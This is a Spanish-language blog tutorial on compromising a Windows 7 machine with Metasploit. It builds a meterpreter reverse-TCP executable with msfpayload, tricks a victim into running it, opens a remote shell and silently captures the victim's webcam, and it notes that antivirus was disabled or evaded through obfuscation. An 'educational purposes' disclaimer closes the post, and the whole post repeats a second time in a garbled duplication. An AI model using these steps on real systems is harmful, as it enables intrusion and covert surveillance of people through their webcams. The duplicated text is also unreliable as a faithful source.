USANDO METEPRETER PARA INGRESAR A UNA WEB CAM
Ya estoy empezando a hacer prácticas más avanzadas, así que en este post voy vamos a utilizar metasploit para tener acceso a una máquina con Windows 7. Generaremos un archivo que se tendrá que ejecutar en la máquina víctima.
Esta manera es la que yo he encontrado más fácil, después de ver algunos videos que hay por la red (sobretodo en otros idiomas).
Lo primero es ejecutar metasploit.
En un terminal ejecutamos “msfconsole”.
Una vez que se carga, tecleamos “show exploits” donde nos muestra los exploits que se encuentran. Una vez que localizamos el que nos interesa ( WINDOWS/SMB/MS08_067_NETAPI), copiamos la ruta y, en el terminal ponemos lo siguiente:
En este punto, tecleamos “show payloads” para ver los payloads”.
Una vez localizado el que buscamos ( Windows/meterpreter/reverse_tcp), abrimos otro terminal y ponemos lo siguiente:
“Msfpayload Windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=4444 x > /usr/prueba.exe”
donde una que vez termine, nos vamos a la carpeta usr y encontraremos el archivo ‘prueba.exe”.
Cogemos este archivo y hay que conseguir que lo ejecuten en la máquina víctima (en este caso, es un entorno de Red), que lo conseguí porque la máquina es mia. J
Una vez que está en la victima el archivo, nos vamos a la terminal donde usamos el exploit y ejecutamos “use multi/handler” para permanecer a la escucha.
Definimos la IP del atacante con “set LHOST ipatacante” y “set LPORT puerto”.
Ponemos “exploit” y se ejecuta. Se queda a la “escucha”, esperando que el payload se ejecute en la máquina victima y se conecte.
Una vez que lo ejecutan, nos aparece en el terminal esto:
Ponemos “Shell” y ya estamos en el prompt del ordenador infectado.
Lo que me llamó la atención fue el acceder a la webcam de la victima.
Para ello, ponemos “exit” para volver al prompt de “meterpreter” y ponemos “webcam_list” para acceder a la webcam disponibles en el equipo.
Posteriormente, ponemos “webcam_snap” y nos realizará una captura de la webcam en ese momento.
Y la captura…..
Eso es todo amigos…..un saludo…y recordad que esto es con fines educativos….hacedlo en un entorno controlado. Yo quite el AV para evitar pasos, pero en la prueba que hice usando SET en el que ofuscaba no me lo detectaba.
Gracias por su post amigo
David
@darksh4m4n
Esta manera es la que yo he encontrado más fácil, después de ver algunos videos que hay por la red (sobretodo en otros idiomas).
Lo primero es ejecutar metasploit.
En un terminal ejecutamos “msfconsole”.
Una vez que se carga, tecleamos “show exploits” donde nos muestra los exploits que se encuentran. Una vez que localizamos el que nos interesa ( WINDOWS/SMB/MS08_067_NETAPI), copiamos la ruta y, en el terminal ponemos lo siguiente:
En este punto, tecleamos “show payloads” para ver los payloads”.
Una vez localizado el que buscamos ( Windows/meterpreter/reverse_tcp), abrimos otro terminal y ponemos lo siguiente:
“Msfpayload Windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=4444 x > /usr/prueba.exe”
donde una que vez termine, nos vamos a la carpeta usr y encontraremos el archivo ‘prueba.exe”.
Cogemos este archivo y hay que conseguir que lo ejecuten en la máquina víctima (en este caso, es un entorno de Red), que lo conseguí porque la máquina es mia. J
Una vez que está en la victima el archivo, nos vamos a la terminal donde usamos el exploit y ejecutamos “use multi/handler” para permanecer a la escucha.
Definimos la IP del atacante con “set LHOST ipatacante” y “set LPORT puerto”.
Ponemos “exploit” y se ejecuta. Se queda a la “escucha”, esperando que el payload se ejecute en la máquina victima y se conecte.
Una vez que lo ejecutan, nos aparece en el terminal esto:
Ponemos “Shell” y ya estamos en el prompt del ordenador infectado.
Lo que me llamó la atención fue el acceder a la webcam de la victima.
Para ello, ponemos “exit” para volver al prompt de “meterpreter” y ponemos “webcam_list” para acceder a la webcam disponibles en el equipo.
Posteriormente, ponemos “webcam_snap” y nos realizará una captura de la webcam en ese momento.
Y la captura…..
Eso es todo amigos…..un saludo…y recordad que esto es con fines educativos….hacedlo en un entorno controlado. Yo quite el AV para evitar pasos, pero en la prueba que hice usando SET en el que ofuscaba no me lo detectaba.
Gracias por su post amigo
David
@darksh4m4n